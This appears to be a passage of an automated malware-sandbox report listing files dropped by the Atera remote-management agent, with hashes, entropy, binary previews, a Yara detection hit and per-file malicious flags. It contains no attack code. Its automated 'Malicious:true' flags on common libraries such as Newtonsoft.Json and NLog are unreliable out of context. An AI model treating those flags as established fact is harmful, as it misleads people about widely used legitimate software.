                                                                                                                                                                                                                                                                                              Preview:Shim Generator - shimgen.exe..Copyright (C) 2017 - Present Chocolatey Software, Inc ("CHOCOLATEY")..Copyright (C) 2013 - 2017 RealDimensions Software, LLC ("RDS")..===================================================================..Grant of License..===================================================================..ATTENTION: Shim Generator ("shimgen.exe") is a closed source application with..a proprietary license and its use is strictly limited to the terms of this ..license agreement.....RealDimensions Software, LLC ("RDS") grants Chocolatey Software, Inc a revocable, ..non-exclusive license to distribute and use shimgen.exe with the official ..Chocolatey client (https://chocolatey.org). This license file must be stored in ..Chocolatey source next to shimgen.exe and distributed with every copy of ..shimgen.exe. The distribution or use of shimgen.exe outside of these terms ..without the express written permission of RDS is strictly prohibited.....While the source for shimgen.exe is

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller.zip

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1185456
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999660178690134
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:24576:Ssoja9MaLduouhVlf0tyv29r1+IdjkaCgs54gvUokF4fEFBb:HoFOJuhV+tyor1+I+aqdM2MFBb
                                                                                                                                                                                                                                                                                              MD5:6C6F85E896655A6EB726482F04C49086
                                                                                                                                                                                                                                                                                              SHA1:2E0C55CD4894117428B34D21A1D53738FCE4B02C
                                                                                                                                                                                                                                                                                              SHA-256:E109400A93FEDE90201BBF37C1868C789888BCE9D03A4AE5B46C48599939C34E
                                                                                                                                                                                                                                                                                              SHA-512:B58303C149DEFFC9E374D5BA42A8A73B7CE890D35F9589FE0B09ACEC541A21D589D49FA5086B965277FA22DFE308357505124F13A6FF1E0DE415EBC40CE61E15
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:PK..-.....J9rX...........=...AgentPackageRuntimeInstaller/AgentPackageRuntimeInstaller.exe....0........g.........^ ....,/_.U. *t....H......Z.X..x#...?....(/.EH.....r.l#.6.......76.b....u',4%.Y.br....W..VcO..[b/.....(....."I..u..S*....../.x...j.5.<b......n.v0.. z'M.....w.. ..qu.<...w...[...9....F...D..+....o....!..1I...^=H1.{.:=\...#V.]...1..)F.s":$.g.H.p.'^....K.F...3..}.......[J....xD.........._RB...... \=b.<.u 1k.Y....&.X.).`>M9.$H.].>t..^..!....}_.H.....h....uT.q..cJE.M... .QG..+?.gZM...G.9x.T.q..U..... X.s.....{....F.G$..$.A.n..jz]=.qi!U..4.>.e.7"..].O.F..XdciK..d_0..H..7rHd.jj.L.v6.< ........2.8....8.mc_.(!...\u...mY.........tv.e..,'..E......l..s`... s...W.Sx9b..Dnc...!0_..T.y..%r..{..E;....v"ce.K....{...).B....:N.H$..h..F.......Y.8k.....M....~9..X-M....f>~t..*#..R......6M....f....>-b.....W. .S.WO.c".>.....+iR..w~.u...6../..J..^&...K.BcQ.Fy....<.O.......P..y..#5:l.4.......~........g.:W...1.p7...K...n{.9~..c.h......NT.5...w........?_>XJ..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):55344
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.139210251385105
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:N2Xj3YqBmARWhNqjxcVqnOvdBsqW/BCiFl0scb/MV7Hx/:wX5BqSBjb0tb/MVJ
                                                                                                                                                                                                                                                                                              MD5:77C613FFADF1F4B2F50D31EEEC83AF30
                                                                                                                                                                                                                                                                                              SHA1:76A6BFD488E73630632CC7BD0C9F51D5D0B71B4C
                                                                                                                                                                                                                                                                                              SHA-256:2A0EAD6E9F424CBC26EF8A27C1EED1A3D0E2DF6419E7F5F10AA787377A28D7CF
                                                                                                                                                                                                                                                                                              SHA-512:29C8AE60D195D525650574933BAD59B98CF8438D47F33EDF80BBDF0C79B32D78F0C0FEBE69C9C98C156F52219ECD58D7E5E669AE39D912ABE53638092ED8B6C3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ........@.. ....................... ......o7....`.................................X...O.......L...............0(..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...L...........................@..@.reloc..............................@..B........................H........K..|v...........................................................0..........s....(......%.-..( ...+..(!...}\.........s....s......o...+o.....=.r...p(.....(....(.....(....o....r?..p(.....(.......,..o ....*.......4..A.3......4.@t.......0..8.......(!...("...(!...(#...($...(!...o%...($...(!...o&.....&..*........44........('...*..{....*..{....*..{....*..{....*..{....*..('.....}......}.......}.......}......}....*......s....*......s....*......s....*......s....*V.('.....}.....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2010
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.013965898836397
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3rrb7O7Rgdp+1/gYoSagFsg+w3Sg+Cag+XgjdgDt:7rne4wCNj
                                                                                                                                                                                                                                                                                              MD5:0B17B3BE9B3A6F6879998D280941DE55
                                                                                                                                                                                                                                                                                              SHA1:EDE825B51EE11AF7C9221DCE596BB969CD068529
                                                                                                                                                                                                                                                                                              SHA-256:1D69336E421C535CECF2E0326BE39B44EEC8EA39754AC8E855D8E0368E0F4619
                                                                                                                                                                                                                                                                                              SHA-512:06D9CC03B8F7295A6E02376159EA96A83CAED4B584769370C0BF365B25D29C883BA5C8359CFEB7316D13C93B49FD37CCA267F6E7931220CED71435E1F4B639C8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.14.0.17971" newVersion="2.14.0.17971" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <d

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.ini

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):11
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.459431618637298
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhUnn:Wu
                                                                                                                                                                                                                                                                                              MD5:5EDA46A55C61B07029E7202F8CF1781C
                                                                                                                                                                                                                                                                                              SHA1:862EE76FC1E20A9CC7BC1920309AA67DE42F22D0
                                                                                                                                                                                                                                                                                              SHA-256:12BF7EB46CB4CB90FAE054C798B8FD527F42A5EFC8D7833BB4F68414E2383442
                                                                                                                                                                                                                                                                                              SHA-512:4CF17D20064BE9475E45D5F46B4A3400CDB8180E5E375ECAC8145D18B34C8FCA24432A06AEEC937F5BEDC7C176F4EE29F4978530BE20EDBD7FED38966FE989D6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=1.6

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):93232
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.195903304850222
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:zSvbne0Q41qJ3n8JMW+0KcBLQhZV5M+5Nn0komH7yAfRS7Hx9:zS8UMW+BV5M+5Nn0kom/RS3
                                                                                                                                                                                                                                                                                              MD5:B969BFF44179BF8A3584EEB9E026CAE1
                                                                                                                                                                                                                                                                                              SHA1:DBA7A528F51870B89AED549E81EF0660F43B2943
                                                                                                                                                                                                                                                                                              SHA-256:5EE05D3796AB12ECF7F2D32D48D41D2A2A3FD257AD8456A0EBD5E6019492ECF1
                                                                                                                                                                                                                                                                                              SHA-512:F0643905258D2C09CA0A6C30A0A9AD5AD2FE184A65B7FFA5B7B731FEE8357672B35246626A10B39DF7C18EF1B75328192495685DDF9CD2F524E913D6A2993E18
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c.........." ..0..:..........^X... ...`....... ....................................`..................................X..O....`..8............D..0(...........V............................................... ............... ..H............text...d8... ...:.................. ..`.rsrc...8....`.......<..............@..@.reloc...............B..............@..B................@X......H.......|f..X............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tM...r...p((..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.CommonLib.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):95280
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.998418289121845
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:6iLY8I1pq2jBTn9kbf0KNGVIYMcoS1JkEX5g7HxlF:/Z0PMcjrgF
                                                                                                                                                                                                                                                                                              MD5:3AB0B86F5D058374AC789F05FB6C6E81
                                                                                                                                                                                                                                                                                              SHA1:4C8142A6EA10F48735429B125ADC278178FA0082
                                                                                                                                                                                                                                                                                              SHA-256:5F773968BD0501D91C4AE1339D248B4F766C39885B35088953AFB1BE6FBCC4E8
                                                                                                                                                                                                                                                                                              SHA-512:1A6CC62361FDD20A99D9551E677269D9D67B6F4B66C09083E07AE5732C23FFE15A5E687437A16A27896A19DECEB9F23D7614B6CC44445C365E3A59DED1AEE6E2
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..B..........R`... ........... ..............................P.....`.................................._..O....................L..0(..........(_..8............................................ ............... ..H............text...X@... ...B.................. ..`.rsrc................D..............@..@.reloc...............J..............@..B................3`......H........h................................................................(......}......}.......}.......}........o=...}....*..{....*>.{....o.......*v.{....o...........s....(...+*...0..<........{....o.....{....#.......@(....o.....{......o........&.....*........55........{....o.....{....#.......@(....o.....{......o....*..0..$........(......`...%..".o......{.....o....*Z.(....r...po!...o....*..{....o0...r...p.(....(....o&...*6..(....o....*..{....*..{....*.s....z.s....z.s....z.s..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.Exceptions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16432
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.6559468525212
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:wXh+/DtYchNyby2sE9jBF6IYiYF8pA5K+oCGUHFeFl55qz:wXh+tYmNyb8E9VF6IYinAM+oCaF5qz
                                                                                                                                                                                                                                                                                              MD5:8E2D0F47E477FAE8132492A31B26F1B3
                                                                                                                                                                                                                                                                                              SHA1:6C3EB7CB1D5E942DC6A62767A701D201E2F69CE1
                                                                                                                                                                                                                                                                                              SHA-256:7C8CD3B61286AAC09534541EDBFF10618938236830167581BD3E922CA55A1456
                                                                                                                                                                                                                                                                                              SHA-512:B40EA70361F5AFCCB3DC41D38A4F302AEE00B9AAC206AD2DFBD1591A7722AF732BC820C3C66EA3BC0816D4C98E364D1345077EDC786ED19135659AC91E0CFC06
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T............." ..0.............v,... ...@....... ....................................@.................................",..O....@..(...............0(...`......H+..8............................................ ............... ..H............text...|.... ...................... ..`.rsrc...(....@......................@..@.reloc.......`......................@..B................V,......H........ ..d...........................................................&...(....*6.r...p.(....*..(....*..(....*"..(....*. ....*.r-..p*..(....*"..(....*. ....*.r...p*..(....*"..(....*. .*..*.r...p*. ....*.rN..p*..(....*.BSJB............v2.0.50727......l.......#~......<...#Strings....D...$...#US.h.......#GUID...x.......#Blob...........G..........3......................................................................f.....F...........n.................M...........2...........Z.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.ModelsV3.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):75312
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.23943595769723
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Tu2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrYH:KF+qo7mDEwj4NXLGcfgruFcg7HxRt
                                                                                                                                                                                                                                                                                              MD5:D5B69F2C4F5CB0E7D43D7F6C1C87DC7E
                                                                                                                                                                                                                                                                                              SHA1:98FDA78C049D650E47C17D9072E82D87C1B59E9F
                                                                                                                                                                                                                                                                                              SHA-256:6C1325D183C7CC3E516628921005F18BB5A191B0029AF93DFB022CA4C2ABBAE9
                                                                                                                                                                                                                                                                                              SHA-512:D95C5CD5E9DAC57FA9C5DE8645F637363A5E787A8C521B09BFBEA56D01765F4FC31E4080BDCAD28BBD90FDB9BEE1CAB50E95FF13CFAC728405D87C3EFE3A387B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6............" ..0.............F.... ... ....... .......................`.......w....`.....................................O.... ..................0(...@..........T............................................ ............... ..H............text...L.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................%.......H.......t<..`.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*...0...........(.....(.....o....(....*.0...........(.....(.....o....(...+*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..(..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.Utils.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):52272
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.4113040933608225
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:TQMnML8f1VNPa7fb8LRaIzlRK/usybUjuUY0vZKE8tcqPqZw+I39Wu1FEpYinAMU:T9ML8LW/usybGYVE8mZw+89Wu1e7Hxav
                                                                                                                                                                                                                                                                                              MD5:94B12931B9032E80157DC27422393FEC
                                                                                                                                                                                                                                                                                              SHA1:2B762FCA27538B55ACF736F7D65E293E5F15EAEA
                                                                                                                                                                                                                                                                                              SHA-256:746AD9902D9310CC2F172736AC156018ECD3843BA58C8337DE017074B06CD645
                                                                                                                                                                                                                                                                                              SHA-512:D943A39FDD74627514818DAF3434BD1ABEB4EE10077E8B10414098DDA2972851795A15CBD4CAD73A67D5171446E4A6D844CDF8BD705E72F34B7DA16678097BE9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&............." ..0.................. ........... ...................................`.................................>...O.......4...............0(..........t...T............................................ ............... ..H............text........ ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B................r.......H........E...s...........................................................0..........(.....o.....s........s............io........,...o.......jo....s....&.o.....P.........io ...&..i.X.P..........i(!.....i(".......(!....(#...*.........*.......0.._........($....s.......(%........i.Yo.....P......jo......s&.......io ...&(........io'.......,..o......*.........FS........((...*2.~....(....*....0...........()...,.r...ps*...z.()...,.r...ps*...z.....~....s+....s,.......o-....[o....o/...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):398896
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1343664856235245
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:5jS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/ZmvM:5+e55LgIkTmyAAfTnMLvM
                                                                                                                                                                                                                                                                                              MD5:FACA1B5218F8EB76963366A6842E122D
                                                                                                                                                                                                                                                                                              SHA1:41B281ABA7D7FE994EE6C77F7F71042885919EC0
                                                                                                                                                                                                                                                                                              SHA-256:D779F3514666734455B5B2B7AEB035F7E1D7394CD445E332DD4D236E24D5C94E
                                                                                                                                                                                                                                                                                              SHA-512:8F350CB3D0C13A701C67749E103B1E07EE1E2EF8EFE71B70CC728F8E21DC02922BAB241CA256695DAC9B225D450623E9F8DA055EA062E336D7F1CD9D2A3FB6D9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`............`.................................v...O.... ..................0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........P...................$.........................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. S]G. )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0...........r...p......%..{)....................-.q.............-.&.+.......o2....%..{*....................-.q.............-.&.+.......o2....(3...*..{4...*..{5...*..{6...*..{7...*..(+.....}4.....}5.....}6......}7...*....0..k........u......,_(,

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\NLog.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1409
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.992215339808616
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:2dNQjY8L2PRRkMYaWcvJ9AwcPGnJg8vQpyriEWZoEs4h:cb8MRRkMVB9AwVbIQdsoEf
                                                                                                                                                                                                                                                                                              MD5:766E089F9AF0DAD5BFD8B77167D1E0FD
                                                                                                                                                                                                                                                                                              SHA1:0AD55E6BA596EFEB24867DC9FDCE4B3D2F2D904F
                                                                                                                                                                                                                                                                                              SHA-256:1D95ED644BB7D706E5B8EBDCB875B23F8B21C62C53C701EB8B3385F770808D7E
                                                                                                                                                                                                                                                                                              SHA-512:FD8ECF32094577A51579911AC3722D839A7B0874146B909EB8DC944CDB5DA459BFCF7EB64B47EC08F40515E6C38B4C4CBA1F4D9F9EB403E891A8710310DBAECA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8" ?>..<nlog xmlns="http://www.nlog-project.org/schemas/NLog.xsd".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. xsi:schemaLocation="http://www.nlog-project.org/schemas/NLog.xsd NLog.xsd".. autoReload="true".. throwExceptions="false".. internalLogLevel="Off" internalLogFile="c:\temp\nlog-internal.log">.... optional, add some variables.. https://github.com/nlog/NLog/wiki/Configuration-file#variables.. -->.. <variable name="myvar" value="myvalue"/>.... .. See https://github.com/nlog/nlog/wiki/Configuration-file.. for information on customizing logging rules and outputs... -->.. <targets>.... .. add your targets here.. See https://github.com/nlog/NLog/wiki/Targets for possible targets... See https://github.com/nlog/NLog/wiki/Layout-Renderers for the possible layout renderers... -->.... .. Write events to a file with the date in the filename... <target xsi:type="File" na

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\NLog.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):883760
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.071504659955744
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:V1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQJ:V1n1p9LdRN39aQZUqM
                                                                                                                                                                                                                                                                                              MD5:17A183A03C34B8EC1C91B3DD0B50E022
                                                                                                                                                                                                                                                                                              SHA1:7D226520BE51BD71D05D7EB56793233794F87DA4
                                                                                                                                                                                                                                                                                              SHA-256:381278035C5A8A4668D31B12F0BF3DEC6544E9668FED84DA038A8D21D233D72D
                                                                                                                                                                                                                                                                                              SHA-512:AD5591F6B90A07C00F10EF19231BB3C766E9E27C2205AB3A32C15B7D0DE0F732A5600665E4302290C771F06370B23E4FF0AC63E51C1F36899F98CCB6BD5F8C01
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..F..........:d... ........... ...............................;....`..................................c..O....................T..0(.......... c..T............................................ ............... ..H............text....D... ...F.................. ..`.rsrc................H..............@..@.reloc...............R..............@..B.................d......H........%...2...........W.......b......................................"..(....*..(....*"..(....*..(....*..(....*..(....*.(....*"..(....*...0..B.......~..........(b...~....,.~.....oc......+...(......od......,..(e....*........../7......"..(....*6.(.....(....*..0..........(.......of...&.*.(....og...*2(.....oc...*....0..?.......~..........(b...~....,.~.....oc...+...(.....oh...&...,..(e....*.........,4.......0..?.......~..........(b...~....,.~....oi......+...(....oj......,..(e..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710192
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960370699367048
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:hBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUW:hBA/ZTvQD0XY0AJBSjRlXP36RMGj
                                                                                                                                                                                                                                                                                              MD5:53D8AD0BCDED36C2EEBD4D3C45A60BD7
                                                                                                                                                                                                                                                                                              SHA1:9289840CB0518AF183BB41AB05428A6415B92AAE
                                                                                                                                                                                                                                                                                              SHA-256:07A068EF96EE5F447282B42B1818FDFC372B674893E6742A5F83DDBC4DF13ACD
                                                                                                                                                                                                                                                                                              SHA-512:41B19112B6CCE405E16153354223F4AFF548E9F55EDFDC158588E78D9EAA755E10865D7220B916EC14DAB4181C55C005B161B44AC011419EE85EFF5F65975523
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
